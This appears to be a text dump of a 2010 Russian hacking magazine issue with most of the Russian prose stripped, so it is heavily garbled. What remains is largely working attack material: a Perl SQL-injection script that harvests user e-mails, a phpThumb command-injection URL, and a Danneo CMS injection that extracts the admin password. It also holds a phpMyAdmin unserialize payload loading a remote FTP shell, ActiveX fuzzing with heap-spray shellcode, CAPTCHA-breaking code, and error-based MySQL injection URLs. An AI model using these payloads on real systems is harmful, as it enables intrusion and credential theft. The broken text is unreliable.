$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; MyIE2)\r\n";
$request .= "Host: " . $host . "\r\n";
$request .= "Content-length: ". strlen($cmd) . "\r\n";
$request .= "Connection: Keep-Alive\r\n";
$request .= " Cache-Control: no-cache\r\n";
$request .= "\r\n";
$request .= $cmd . "\r\n";
$socket = fsockopen($host, $port ? $port : 80);
fputs($socket, $request);
while(!feof($socket)) echo fgets($socket, 1024);
fclose($socket);
}
?>
3.:
http://localhost/input.php?host=www.example.
com&script=index.php?page=&cmd=phpinfo()
4. :).
:SQL--
:-,.,
.
#!/usr/bin/perl
use LWP::Simple; # LWP::Simple http
open(FH,">dump.txt");#
$lim=0; # $lim -
limit
while(1) { #
$url="http://www.example.com/profile.php?id=-1+union+sele
ct+concat('c0de',email,'ed0c')+from+users+limit+$lim,1";
# SQL-,
e-mail , -
$content = get("$url"); # get(),
if($content =~ m/c0de(.*)ed0c/) { # c -
print FH $1."\n"; #
$lim++; # $lim
} else { #
print 'Total dumped ' . $lim; # -
exit; #
}}
!,
, -
.
dump-
4
7/22/2019 2010 04(135).pdf
39/148
7/22/2019 2010 04(135).pdf
40/148
icq 884888, http://snipper.ru
GNOME-SCREENSAVER
BRIEF Gnome-screensaver
GNOME,,,
openSUSE
. (
2.28.2 )
,,-
,
.
.
, dk_
window_begin_implicit_paint() (GTK+),
-
:)
EXPLOIT (
)-vigilance.fr:
1. (
);
2.;
3.;
4.-
,
.
Enter,, ,
.
TARGETS gnome-screensaver true,
'passthru'=>true, 'system'=>true, 'exec'=>true);
foreach ($AllowedExecFunctions as $execfunction => $is_
allowed) {
switch ($execfunction) {
case 'passthru':
case 'system':
ob_start();
$execfunction($command);$returnvalue = ob_get_contents();
ob_end_clean();
break;
case 'exec':
, ! - , . , , !
038
02
X 04 /135/ 10
Bugzilla
Bugzilla advisory
01
7/22/2019 2010 04(135).pdf
41/148
$output = array();
$lastline =
$execfunction($command, $output);
$returnvalue = implode("\n", $output);
break;
case 'shell_exec':
ob_start();
$returnvalue = $execfunction($command);ob_end_clean();
break;
}
}
PHP
(,,,disable_functions
, , , passthru).
,
.
.phpThumb,
.phpthumb.class.php:
function ImageMagickThumbnailToGD() {
foreach ($this->fltr as $filterkey => $filtercommand) {
@list($command, $parameter) = explode('|',
$filtercommand, 2);
//, ImageMagick
switch ($command) {
case 'blur':
if ($this->ImageMagickSwitchAvailable('blur')) {
@list($radius) = explode('|', $parameter);
$radius = ($radius ? $radius : 1);
$commandline .= ' -blur '.$radius;
unset($this->fltr[$filterkey]);
}
break;
$this->DebugMessage('ImageMagick called as
('.$commandline.')', __FILE__, __LINE__);
$IMresult = phpthumb_functions::SafeExec($commandline
);
$this->DebugMessage('ImageMagick failed with message
('.trim($IMresult).')', __FILE__, __LINE__);
}
SHELLCODE'A-,ASCII
Danneo CMS
039X 04 /135/ 10
sqlDanneoCMS
7/22/2019 2010 04(135).pdf
42/148
040 X 04 /135/ 10
:
$radius,$commandline,-
SafeExec();
- DebugMessage() -
.
, ImageMagick
(blur"):
site.com/phpThumb.php?fltr[]=blur|5
- (
19,):
http://site.com/phpThumb.php?phpThumbDebug=9
,
, -
phpThumb.
EXPLOIT -
, .,,
,
.*nix:
http://site.com/phpThumb_1.7.9/phpThumb.
php?src=/home/site.com/public_html/kartinka.
jpg&fltr[]=blur|5 -quality 75 -interlace line /
home/site.com/public_html/kartinka.jpg" jpeg:"/
home/site.com/public_html/kartinka.jpg" ; [_-
] ;&phpThumbDebug=9
, -
.,
Windowshttp://snipper.ru/view/8/
phpthumb-179-arbitrary-command-execution-exploit.
TARGETS phpThumb
7/22/2019 2010 04(135).pdf
43/148
X 04 /135/ 10 041
$PHPTHUMB_CONFIG['prefer_imagemagick'] = false;
PHP
disable_functions.
DANNEO CMS 0) ?$usermain['uname'] : substr(deltags($comname),0,50);
$comtitle = substr(deltags($comtitle),0,255);
$in = $db->query("INSERT INTO .$basepref."_polling_
comment VALUES
(NULL,'".$id."','".$usermain['useri
d']."','".NEWTIME."',
'$comname','$comtitle','$comtext','".REMOTE_ADDRS."')");
,$comtitle 255,
(-
phpThumb
phpThumb
03
7/22/2019 2010 04(135).pdf
44/148
42042 X 04 /135/ 10
\', \ ")
$comtext.,
./base/danneo.track.php,,,-
:
$baddata = array("UNION",
"OUTFILE",
"FROM",
"SELECT",
"WHERE",
"SHUTDOWN",
"UPDATE",
"DELETE",
"CHANGE",
"MODIFY",
"RENAME",
"RELOAD",
"ALTER",
"GRANT",
"DROP",
"INSERT","CONCAT",
"cmd,
"exec",
"--"
);
foreach($_REQUEST as $params => $inputdata){
foreach($baddata as $badkey => $badvalue){
if(is_string($inputdata) &&
eregi($badvalue,$inputdata)){ $badcount=1; }
}
}
][ , , ,
, ereg[i]
-,
$comtext,-
.Danneo, ./
base/danneo.function.php:
if(!ini_get("register_globals") || (@get_cfg_
var('register_globals')==1)){
//@import_request_variables('GPC');
@extract($_COOKIE,EXTR_SKIP);
@extract($_POST,EXTR_SKIP);
@extract($_GET,EXTR_SKIP);
@extract($_REQUEST,EXTR_SKIP);
if(get_magic_quotes_gpc()) {
if($_POST) $_POST = stripslashesall($_POST);
if($_GET) $_GET = stripslashesall($_GET);
if($_REQUEST) $_REQUEST = stripslashesall($_REQUEST);
if($_COOKIE) $_COOKIE = stripslashesall($_COOKIE);
}
,magic_quotes
stripslashesall() (
, $comtitle$comtextSQL-),
- :)
EXPLOIT-
:
1.$comname , 5-10 ;
2.$comtitle 254 (magic_
quotes = off, \");
3.$comtext /*[NULL BYTE]*/, (SELECT adpwd FROM dn052_admin LIMIT 1), 1)-- -
POST--
:
comname=lololo&comtitle=[254 ]'&comtext=/*\
x00*/, (SELECT adpwd FROM dn052_admin LIMIT 1), 1)---&id=[ID ]&ajax=0&re=comment
,SQL-
:
WordPress
7/22/2019 2010 04(135).pdf
45/148
X 04 /135/ 10 043
INSERT INTO dn052_polling_comment VALUES (NULL,'1','0',
'1230987393','lololo','[254 ]\','/*\0*/, (SELECT
adpwd FROM dn052_admin LIMIT 1), 1)-- -','127.0.0.1')
.
http://www.inj3ct0r.com/
exploits/11004.
TARGETS Danneo CMS posts = array();
} else {
if (in_array($status, array('draft', 'pending'))
) {
,:
1. -
;
2. draftpending,
trash.
EXPLOIT, , trash--
advisoryhttp://tmacuk.co.uk/?p=180 .
TARGETS WordPress 2.9, 2.9.1
SOLUTION ,
http://wordpress.org/download.
BUGZILLA
BRIEF
Bugzilla -,-
(,
https://bugzilla.mozilla.org ).
,
.
,
-
.htaccess,,
,
.
process_bug.cgi (249):
foreach my $group (@{$bug->product_obj->groups_valid})
, $bug->product_obj"
,
,
,
. , ,
, .
EXPLOIT
:
1.CVS/,
contrib/, docs/en/xml/, t/" old-params.txt, ;
2.,
-
,
(),
.
advisory
bugzilla.org/security/3.0.10.
TARGETS
: Bugzilla < 3.0.11, < 3.2.6, < 3.4.5,
7/22/2019 2010 04(135).pdf
46/148
X 04 /135/ 10
-
,
xakep.ru,
dvd
DVD
-
-
, . , ,
. -,
, -
,
(
LiveJournal). .
, -
, -
. ,
,
, ,
30
90%, .
1000 $1, . , -
, ,
(-), , -
, .
.
2.0
,
.
,
,
. CAPTCHA Com-
pletely Automated Public Turing test
to tell Computers and Humans Apart.
.
,
044
7/22/2019 2010 04(135).pdf
47/148
X 04 /135/ 10 045
.
, -
. -
,
. -
,
.
,
, -
, . ,
-
. -
PageRank -
,
, -
,
.
-
,
, , -
.
,
-
-. -
, 1%, ,
100 .
. , 6 -
,
(10 + 26) ^ 6 2
., .
, ,
, , -
, 10 .,
. -
(?),
. ,
.
: -
, .
,
,
. ,
,
. ,
, -
. ,
, .
,
-. ,
, -
. -
-.
, , -
. xakep.ru,
. , 10000
, .
, -
, -
, .
: , ,
, . -
,
, .
,
, -, , -,
.
5% -
. -
, 20-
.
. .
. , 100 .
,
,
, .
, -
. ,
, ,
(,
2716.jpg). -
, PHP Python,
Matlab,
. PHP,
image, -
imagecolorat. , ,
,
:
class Xakep_CAPTCHA
{
//
-,
4-- (16x24)
7/22/2019 2010 04(135).pdf
48/148
X 04 /135/ 10
protected function colordist($color1, $color2)
{
return sqrt(pow((($color1 >> 16) & 0xFF)
- (($color2 >> 16) & 0xFF), 2)
+ pow((($color1 >> 8) & 0xFF)
- (($color2 >> 8) & 0xFF), 2)
+ pow(($color1 & 0xFF)
- ($color2 & 0xFF), 2));
}
// , ,
// 200
protected function update_mask()
{ $this->mask = array();
for ($i = 0; $i < $this->width; $i++)
for ($j = 0; $j < $this->height; $j++)
$this->mask[$i][$j] = $this->colordist
(imagecolorat($this->image, $i, $j),
$this->bg_color) > 200 ? 1 : 0;
}
}
, -,
, , -, -
.
, ,
. -
.
xakep.ru (~19 )
(16x24 ) -
. , , -
-
.
, -
-
.
.
, - .
()
.
, (
). ,
4 ,
,
,
-
. : x, y (
) d
.
-
, .
, ,
,
. -
:
().
,
().
,
.
,
,
.
-
, -
. -
,
(,
-
).
() ,
. -
,
. ,
..
x, y d, -
.
:
//
public function test_dna($array){
$fitness = 0;
for ($d = 0; $d < $this->digits_quantity; $d++)
for ($i = 0; $i < $this->digit_width; $i++)
for ($j = 0; $j < $this->digit_height; $j++)
{
//
(x, y) (d)
$x = $this->digit_kerning * $d + $i +
$array['x'] + round($array['d'] * ($j / $this->digit_
height));
$y = $j + $array['y'];
$fitness += $this->mask[$x][$y];}
return $fitness;
}
""
046
7/22/2019 2010 04(135).pdf
49/148
X 04 /135/ 10
,
, .
-
.
90%
--
. -
4
(16x24 ):
protected function divide_digits($params)
{
$this->digits = array();
for ($i = 0; $i < $this->digits_quantity; $i++)
{
//
$this->digits[$i]['image'] =
imagecreatetruecolor($this->digit_width,
$this->digit_height);
$this->digits[$i]['width'] = $this->digit_width;
$this->digits[$i]['height'] = $this->digit_height;
for ($x = 0; $x < $this->digit_width; $x++)
{ for ($y = 0; $y < $this->digit_height; $y++)
{
// , ""
$d = round($params['d'] * ($y / $this->digit_
height));
$co lor = imagecolorat($this->image, $x +$this->digit_kerning * $i + $d + $params['x'], $y +
$params['y']);
imagesetpixel($this->digits[$i]['image'], $x, $y,
$color);
}
}
}
}
.
-
, . -
, .
-
(
). -
. ,
0 1.
: -
. ,
. -
(feedforward ),
()
().
()
(, ).
-
: , -
.
. , -
, ,
-
,
.
,
Fast Artificial Neural
Network (www.leenissen.dk/fann). ,
-
-
. :
//
// :
// 1.
// 2. (1 )
// 3.
$ann = fann_create(array(384, 150, 10), 1, 0.7);
//
// :
// 1.
// 2. (, ,
)
// 3.
// 4.
// 5. ,
fann_train($ann, $set, 10000, 0.001, 100);
// $input
$output = fann_run($ann, $input);
// fann_save($ann, 'ann.data');
//
$ann = fann_create('ann.data');
384, 150 10 .
() (1624
= 384) , 0 1 (-
), -
, 10
0 1, :
, , -
.
, , , -
,
.
,
047
-
7/22/2019 2010 04(135).pdf
50/148
RAZ0R HTTP://RAZ 0R.NAME
X 04 /135/ 10
, -
:
function train()
{
$dir = "samples/";
$set = array();
if ($dh = opendir($dir))
{
while (($file = readdir($dh)) !== false)
{
if (filetype($dir.$file) == 'file')
{
$answer = str_replace('.jpg', '', $file);
$xc = new Xakep_CAPTCHA($dir.$file,
'ann.data', 4, $answer);
$out = $xc->parse();
$set []= $xc->sample;
}
}
closedir($dh);
}
$ann = fann_create(array(384, 150, 10), 1, 0.7);
fann_train($ann, $set, 10000, 0.001, 100);
fann_save($ann, 'ann.data');
}
100 43% -,
3% (0.43 ^ 4), .
100 , 55% -
10% . ,
1-2
,
10-20 . , , ,
. -
:
function test()
{
$dir = "test/";$c = 0;
$wins = 0;
if ($dh = opendir($dir))
{
while (($file = readdir($dh)) !== false)
{
if (filetype($dir.$file) == 'file')
{
$xc = new Xakep_CAPTCHA($dir.$file,
'ann.data', 4);
$out = $xc->parse();
if ($out == str_replace('.jpg', '', $file))
$wins++;
print ' '.$out.'
';
flush();
$c++;
}
}
closedir($dh);
}
print $wins.'/'.$c;
}
, ,
, .
,
, -
. xakep.ru ? -, , -
,
. -, ,
,
-
. -,
6,
.
. , -
, -
, ,
SMS ( Google ).
, ,
-. ,
,
OpenID-, -
.z
048
7/22/2019 2010 04(135).pdf
51/148
X 04 /135/ 10 049
RECAPTCHA, ,
reCAPTCHA (recaptcha.net). reCAPTCHA
-
-
. ,
,
. ,
, , -
,
. reCAPTCHA ,
,
,
.. -
-
OCR-. ,
reCAPTCHA
, -
. reCAPTCHA
,
.
(ocr-research.org.ua)
. ,
,
.-,
(-
). -,
,
, -
,
. -
,
. -
,
,
. -
.
-
,
,
.
mail.ru.
.
.
.
, ,
,
: ,
. -
.
-
, ,
, -
.
.
:
-
,
. -
,
, mail.ru
.
-
(
brightcove.newscientist.com/services/player/
bcpid2227271001?bctid=47814603001 ).
-
(,
) ,
.
.
,
.
,
. ,
,
.
,
,
. ,
(
), -
.
,
.
7/22/2019 2010 04(135).pdf
52/148
7/22/2019 2010 04(135).pdf
53/148
X 04 /135/ 10 051
advisoryphpMyAdmin phpMyAdmin
piwik.org -
Piwik
builds.piwik.org/?
C=M;O=D
Piwik
suspekt.org/2009/
12/09/advisory-
032009-piwik-
cookie-unserialize-
vulnerability Piwik
Cookie unserialize()
Vulnerability
framework.zend.
com/download -
Zend Framework
smarty.net
Smarty
php.net/call_user_
func_array -
call_
user_func_array()
suspekt.org/
downloads/Piwik_
Smarty.txt -
Piwik
Smarty
suspekt.org/
downloads/Piwik_
Config.txt
-
Piwik
gnucitizen.org/
static/blog/2009/06/
phpmyadminrcesh.txt phpMyAdmin '/
scripts/setup.php'
PHP Code Injection
RCE PoC v0.11
snipper.ru/view/12/
phpmyadmin-
2119-unserialize-
arbitrary-php-code-
execution-exploit
phpMyAdmin _writers as $writer) {
$writer->shutdown();
}
}
shutdown() , _writers.
shutdown-.
./libs/Zend/Log/Writer/Mail.php:
public function shutdown()
{
...
if (empty($this->_eventsToMail)) {return;
}
...
if ($this->_layout) {
...
// If an exception occurs during
rendering, convert it to a notice
// so we can avoid an exception
thrown without a stack frame.
try {
$this->_mail->setBodyHtml($this->_
layout->render());
} catch (Exception $e) {
...try {
$this->_mail->send();
} catch (Exception $e) {
...
}
...
}
-, ,
-
e-mail. , -
.
unserialize-.
-, ,
,
:).
, render.
Piwik_View
./core/View.php:
public function render()
{
try {
...
} catch(Exception $e) {
// can fail, for example at
installation (no plugin loaded yet)
}
...
return $this->smarty->fetch($this-
>template);
}
,
, ,
Smarty -
.
SMARTY, Smarty PHP--
, -.
, fetch() ./libs/
Smarty/Smarty.class.php:
function fetch($resource_name, $cache_id =
null, ...)
{
...
if ($display && !$this->caching &&
count($this->_plugins['outputfilter']) ==
0) {
if ($this->_is_compiled($resource_
name, $_smarty_compile_path)
|| $this->_compile_resource($resource_name, $_smarty_compile_
path))
{
include($_smarty_compile_path);
7/22/2019 2010 04(135).pdf
54/148
X 04 /135/ 10
}
} else {
...
_compile_resource :
function _compile_resource(
$resource_name,
$compile_path)
{
$_params = array('resource_name'
=> $resource_name);
if (!$this->_fetch_resource_
info($_params))
{return false;
}
_fetch_
resource_info
:
function _fetch_resource_info(
&$params)
{
...
switch ($_resource_type) {
case 'file':
...break;
default:
// call resource functions
to fetch the template source and
timestamp
if ($params['get_source'])
{
$_source_return =
isset($this->_plugins['resource']
[$_resource_type]) && call_
user_func_array($this->_
plugins['resource'][$_resource_
type][0][0], array($_resource_
name, &$params['source_content'],
&$this));
...
}
! PHP-
call_user_func_array
callback- :).
call_user_func_
array :
callback-
,
.
PHP-
:
1. eval(), ,
, -
,
call_user_func_array;2. assert() ( eval)
, ,
3 ,
assert .
-
, -
Smarty eval:
function _eval(
$code, $params=null)
{
return eval($code);
}
2 ,
.
,
PHP,
,
.
-
,
(
).
,
base64_encode , , -
evil-,
PHP- Piwik.
,
unserialize
.
PHPMYADMIN :).
,
, ,
MySql phpMyAdmin
2.11.9 (, ,
). ,
./scripts/setup.php
,
-
. ,
,
-
./config
(-
),
.
.
, ./scripts/setup.php
,
unserialize:
if (isset($_POST['configuration'])
&& $action != 'clear')
{// Grab previous
configuration, if it should not
be cleared
$configuration=unserialize(
$_POST['configuration']);
}
, $_
POST['configuration']
unserialize() ,
-
__wakeup __destruct.
- ./libraries/Config.class.php:
function __wakeup() {
if (! $this->checkConfigSource()
Piwik
advisory
052
7/22/2019 2010 04(135).pdf
55/148
X 04 /135/ 10
|| $this->source_mtime !==
filemtime($this->getSource())
|| $this->default_source_mtime !==
filemtime($this->default_source)
|| $this->error_config_file
|| $this->error_config_default_file) {
$this->settings = array();
$this->load();
$this->checkSystem();
}
...
}
,
load().
:
function load($source = null)
{
...
if (! $this->checkConfigSource()) {
return false;
}
...
if (function_exists('file_get_contents'))
{
$eval_result = eval('?>' .
trim(file_get_contents(
$this->getSource())));
} else
{
$eval_result = eval('?>' .
trim(implode("\n",
file($this->getSource()))));
}
...
}
, eval-,
PHP-
:).
getSource -
checkConfigSource:
function getSource() {
return $this->source;
}
...
function checkConfigSource() {
...
if (! file_exists($this->getSource()))
{...
return false;
}
if (! is_readable($this->getSource())) {
...
die('Existing configuration file (' .
$this->getSource() . ') is not readable.');
}
...
$perms = @fileperms($this->getSource());
if (!($perms === false) && ($perms & 2))
{
...
die('Wrong permissions on configuration
file, should not be world writable!');
}
return true;
}
, , , -
. file_exists(), is_readable() fileperms() -
file_get_contents() URL PHP -
. . PHP 5,
-
ftp, file_exists('ftp://ftp.com/
shell.txt') true. http
. ,
,
unserialize, $_POST['configuration']
( "source"):
O:10:"PMA_Config":1:{s:6:"source";s:70:"ft
p://login:password@tvoy_host.com/www/shell.
txt";}
phpinfo(), shell.txt
ftp- ""
(exit; , "Fatal
error").
.
EPIC WIN
, -
, PHP,
, ! -
.
( :)
. , ,
unserialize-
,
. ! z
:)
,phpinfo()Piwik
053
info
Raz0r'raz0r.
name/obzory/novye-
sposoby-obxoda-waf-
i-php-eksploity.
unserialize-
vBulletin, ,
, -
.
INFO
7/22/2019 2010 04(135).pdf
56/148
d0znpp http://oxod.ru
054 X 04 /135/ 10
-
.
,
,
. , ,
-,
. ,
,
-
, -
.
-
.
,
-
max_execution_time
500-. -,
.
(
TIFF), -
.
11 ,
-
. ,
, .
-
Register_Globals=ON.
,
,
,
.
PHP
.
PHP :
max_execution_time
max_input_nesting_level
max_input_time
memory_limit
pcre.backtrack_limit (PHP>=5.2.0)
pcre.recursion_limit (PHP>=5.2.0)
post_max_size (PHP>=4.0.3)
upload_max_filesize
max_file_uploads (PHP>=5.2.12)
, -
, common :).
()
php.net/manual/en/ini.list.
php. max, limit.
-
. ,
, :
, -
PHP -.
,
, ,
max_execution_time,memory_limit.
error_reporting=E_
ERROR , display_errors=On.
-
- -,
. , . , , .
CMS, , . .
,
-
7/22/2019 2010 04(135).pdf
57/148
X 04 /135/ 10 055
. , ,
.
, , ,
.
, .
URI MAX LENGTH MAX_INPUT_NESTING_LEVEL
GET-
. , .
-
, -
(). PHP
:
function fuzz_max_uri_len($url)
{
$headers = array();
$data = array();
$left = 500; // -
$right = 64000;//
$accur = 5;//, -
while (($right-$left) > $accur){$cur = ($right+$left)/2;
$data['x'] = str_repeat("x",$cur);
list($h,$c,$t) = sendGetRequest($url,
$headers, $data);
$s = intval(substr($h,9,3));
if ($s
7/22/2019 2010 04(135).pdf
58/148
X 04 /135/ 10
memory_get_usage().
-
.
, a
GET. -
1 .
, ,
?a=aaa,
.
GET- (
).
?a[],-
500 .
,
max_input_nesting_level.
,
, -
. -
,
,
. ,
?a([]x2500 )
1.2 . , ,
, memory_limit,
-
.
,
:
auto_append_file
php.ini. -
,
. :
function findMarker($content)
{
$p1 = strpos($content,
"ONsec E500 mem:");
if ($p1===false){
return 0;
}
else {
$p2=strpos($content,"#",$p1);
if ($p2===false){
return 0;}
else {
$mem = substr($content,
$p1+15,$p2-$p1-15);
}
}
return intval($mem);
}
.
. ,
,
, .
-
, .
, -
POST,
.
PoC
fuzz_memory_usage().
-
(POST,GET,Multipart)
-
.
, ,
, .
,
,
, . -
,
max_execution_time, .
OWASP,
dead_code. -
,
, , -
. ,
-
, ,
, . ,
, . ,
-
.
, .
,
, -.
, ,
, -
. -
,
,
. , ,
, ,
, .
,
. ,
,
, . ,
,
-.
PoC.-,, .20.
-GET., - :)
056
7/22/2019 2010 04(135).pdf
59/148
X 04 /135/ 10
.
, :
1. , -
,
(16^3=4096).
2., -
.
3. 250 ,
, . -
.
,
. Multipart, -
. -,
, .
20 , , -
.
,
. -
:
function parseResults($dir)
{
if (is_dir($dir))
{
if ($dh = opendir($dir))
{
$i=0;
$results = array();
while (($file = readdir($dh)) !== false)
{
$curFile = $dir.$file;
$fh = fopen($curFile, 'r');
$filedata = fread($fh, filesize($curFile));
$fsize = filesize($curFile);
$p1 = strpos($filedata,"Maximum execution time of ");
if ($p1 === false) {}
else{
$p2 = $p1+52;
$p3 = strpos($filedata,"",$p2);
if ($p3 === false) {}
else{$len = $p3-$p2;
$path = substr($filedata,$p2,$len);
$unique = true;
//
foreach($results as $key=>$value){
if ($value['path']==$path){
$unique=false;
break;
}
}
if ($unique){
$len = $p3-$p2;
$res = array('path'=>
substr($filedata,$p2,$len),'len'=>$fsize);
$results[$i]=$res;
$i++;
}
}
}
fclose($fh);
}
closedir($dh);
$size=count($results)-1;
//
for ($i = $size; $i>=0; $i--) {
for ($j = 0; $j$results[$j+1]['len']) {
$k = $results[$j];
$results[$j] = $results[$j+1];
$results[$j+1] = $k;
}
}
return $results;
}
}
}
-
, .
, .
, 126 30.
. ,
PoC !
. ,
, ,
. ,
, . , PoC -
.
. , .
, .z
PoC. 3083 , 126 .
GET -.
GET .
057
7/22/2019 2010 04(135).pdf
60/148
aka Don_Huan [email protected]
058
ActiveX-
. 2006
,
.
ActiveX
COM- Microsoft , ,
DLL
OLE- OCX,
- , , , .
X 04 /135/ 10
ACTIVEX
-
HTML ,
CLSID. ,
JavaScript-
ActiveXObject(..),
ProgID. CLSID
{11111111-2222-3333-4444-555555555555}. ProgID -
, ,
CLSID. CLSID, ProgID -
COM-.
: HTML-
ActiveX ,
(:
XSS
HTML-
..),
.
,
-
. :
,
,
,
. , ,
, ActiveX
,
,
. ,
, -.
,
. -
ActiveX-
, -
, .
. , ActiveX-
CLSID {11111111-2222-3333-4444-
555555555555}.
,
HKEY_CLASSES_
ROOT\CLSID\{11111111-2222-3333-4444-
555555555555} Implemented Categories (
, ,
).
,
-
.
{7DD95802-9882-11CF-9FA9-
00AA006C42C4} -
{7DD95801-9882-11CF-9FA9-
00AA006C42C4}
, .
, ,
KillBit. -
HKEY_LOCAL_
7/22/2019 2010 04(135).pdf
61/148
X 04 /135/ 10 059
MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX
Compatibility\{11111111-2222-3333-4444-555555555555}.
Compatibility Flags HEXe
0x00000400 KillBit.
.
, . ,
:
Object not safe for scripting
ActiveX? ,
.
IObjectSafety.
.
INTERFACESAFE_FOR_UNTRUSTED_
CALLER INTERFACESAFE_FOR_UNTRUSTED_DATA,
.
,
.
.
?
,
/++, -
, .
,
, . -
, .
Fuzzing-,
COMRaider [labs.idefense.com/
software/fuzzing.php]. , AXman
[digitaloffense.net/tools/axman/], COMRaider, -
. -
ActiveX, . -
, IE. , .
, -
.
,
, ActiveX-
. ,
,
, , . -
. , ,
.
fuzzing
,
ExecuteCmd()?
, COMRaider.
,
COMRaider
FileMon RegMon. ,
, -
. COMRaider.
,
View .
Options -
, Edit
BuildArgs.vbs.
,
Visual Basic-. -
GetStrArgs(),
.
for i=100 to 10000 step 1000
parent.strs.add "String(" & i & ",
""A"")"
next
for i=10000 to 100000 step 10000
parent.strs.add "String(" & i & ",
""A"")"
next
100 10000 1000. 10000,
100000. 20
.
%s %n
.
:
parent.strs.add """C:\31337.txt"""
parent.strs.add """31337"""
parent.strs.add """http://""+String(10000,
""B"")"
parent.strs.add """C:\""+String(10000,
""B"")"
.
,
.
,
-
-
ActiveX, -
.
(-
!!!)
dvd
DVD
ActiveX Acrobat Reader-
7/22/2019 2010 04(135).pdf
62/148
X 04 /135/ 10
Start,
Scan a directory for registered COM servers.
. ,
, ,
.
. -
,
.
, COMRaider
,
.
, FileMon
. , ActiveX,
,
: %WINDIR%\Downloaded Program
Files. -
5000 -
.
, ,
Bulid Obj Safety Report for Selected
COMRaider
. -
, .
.
. -
. ,
-
. ,
.
,
, -
Internet Explorer .
Start -
Choose from controls that should be
loadable in IE.
.
FileMon RegMon -
31337. ,
,
. ,
-
COMRaidere,
,
Scan Selected For Strings,
file
,path,url,key,load,download,safe,read,write,file,e
xecute .. -
() -
. ,
-, - heap spray
heap spray
SEH!
060
7/22/2019 2010 04(135).pdf
63/148
X 04 /135/ 10
Fuzz Selected. COMRaider,
,
,
-.
Begin Fuzzing,
:).
, . -
, -
.
emsmtp.dll 6-. -
, , Oracle Document
Capture (10.1350) (oracle.
com/technology/software/products/content-
management/index_dc.html), -
.
, .
Caused Exception,
-
. -
, ,
,
, ,
. ,
, EIP
41414141, , SEH-
.
,
. ,
.
OllyDBG (ollydbg.de).
COMRaider,
Launch in Olly.
, F9,
.
Olly ,
CMP,
[ESI+180] .
ESI A
0x41414141, -
,
0x41414141+0x180=0x414142C1
,
. ,
().
,
41,
SEH.
, ,
, ,
,
CALL DWORD PTR DS:[ESI+CC],
ESI,
SEH,
ESI.
, , ,
.
,
,
-
. -
,
.
308 ., -
SEH .
, 308 , 4 -
SEH-.
100 ,
ESI
.
COMRaider, BuildArgs.vbs:
beg=256
stri=String(beg,"0")
letter="A"
for i=(beg+4) to 500 step 4
if letter="Z" thenletter ="A"
end if
stri=stri+String(4,letter)
letter=Chr(Asc(letter)+1)
parent.strs.add """"&stri&"""" next
, 260
, 4
ESI. 4
, 4 ,
.
32- 4 ,
SEH. ,
:
fill= String(260, "X")
parent.strs.add """&fill&"CCCCFFFF
AAAAFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFBBBB"""
:
ESI=CCCC (43434343)
SEH=BBBB (42424242)
=AAAA (41414141)
, ESI,
CCCC , -
.
SEH-.
,
,
SEH-. -
,
, ,
,
, ,
,
. ,
. .
,
.
( IE 6/7,
) .
-
(exploit-db.com/exploits/10007) -
SEH-
jmp esp user32.dll.
ESP -
(),
.
user32.dll
. ,
. -
,
. -
FileMon
""
COMRaider-
061
7/22/2019 2010 04(135).pdf
64/148
RAZ0R HTTP://RAZ 0R.NAME
X 04 /135/ 10
heap spray (, !).
,
- (nop)
.
, iexplorer-
.
, 99%, -
, . 0x0d0d0d0d
.
c
JavaScript.
heap spray:
var bigbk=unescape("%u9090%u9090%
u9090%u9090"); //90 nop,
while(bigbk.length
function Exploit(){
// exec notepad
var shell = unescape("%ue8fc%u0089
%u0000%u8960%u31e5%u64d2%u528b%u8b3
0%u0c52%u528b%u8b14%u2872%ub70f%u26
4a%uff31%uc031%u3cac%u7c61%u2c02%uc
120%u0dcf%uc701%uf0e2%u5752%u528b%u
8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301
%u3ce3%u8b49%u8b34%ud601%uff31%uc03
1%uc1ac%u0dcf%uc701%ue038%uf475%u7d
03%u3bf8%u247d%ue275%u8b58%u2458%ud
301%u8b66%u4b0c%u588b%u011c%u8bd3%u
8b04%ud001%u4489%u2424%u5b5b%u5961%
u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86
%u016a%u858d%u00b9%u0000%u6850%u8b3
1%u876f%ud5ff%ue0bb%u2a1d%u680a%u95
a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u7
5e0%ubb05%u1347%u6f72%u006a%uff53%u
6ed5%u746f%u7065%u6461%u0000");
//
// 0x0d0d0d0d c -
99% -
var bigbk=unescape("%u9090%u9090%u
9090%u9090");
while(bigbk.length
7/22/2019 2010 04(135).pdf
65/148
7/22/2019 2010 04(135).pdf
66/148
(Positive Technologies) http://devteev.blogspot.com
064
SQL-
, , (union). . , ?!
X 04 /135/ 10
ERROR-BASEDSQL-INJECTION
, - SQL-,
. -
.
,
, , -
.
ERROR-BASEDBLIND SQL INJECTION MYSQL Qwazar "
" -
SQL--
, MySQL. ,
.
MySQL >= 5.0:
mysql> select 1,2 union select count(*),concat(version(),floor(ran
d(0)*2))x from information_schema.
tables group by x;
ERROR 1062 (23000): Duplicate
entry '5.0.841' for key 1
mysql> select 1 and (select 1
from(select count(*),concat(ver
sion(),floor(rand(0)*2))x from
information_schema.tables group by
x)a); ERROR 1062 (23000): Duplicate
entry '5.0.841' for key 1
,
(MySQL < 5.0, ), ,
rand().
, -
http-.
mysql> select 1 and row(1,1) >(select count(*),concat(version(),0x
3a,floor(rand()*2))x from (select 1
union select 2)a group by x limit 1);
...
1 row in set (0.00 sec)
...
mysql> select 1 and row(1,1)>(select
count(*),concat(version(),0x3a,floo
r(rand()*2))x from (select 1 union
select 2)a group by x limit 1);
ERROR 1062 (23000): Duplicate entry
'5.0.84:0' for key 1
:
http://server/?id=(1)and(select+1+fr
om(select+count(*),concat((select+ta
ERROR BASED SQL-INJECTION
7/22/2019 2010 04(135).pdf
67/148
X 04 /135/ 10 065
links
HTTP://WWW
qwazar.ru/?p=7
tinkode.baywords.
com.
ble_name+from+information_schema.tables+limit+0
,1),floor(rand(0)*2))x+from+information_schema.
tables+group+by+x)a)--
http://server/?id=(1)and(select+1+from(select
+count(*),concat((select+table_name
+from+information_schema.tables+limit+1,1),
floor(rand(0)*2))x+from
+information_schema.tables+group+by+x)a)--
Qwazar MySQL,
3.x, -
. , -
, MySQL 4.1,
-
.
, -
TinKode,
blind SQL-Injection
Web- army.mil.
Web-,
MSSQL 2000/2005,
.
TinKode ,
MSSQL
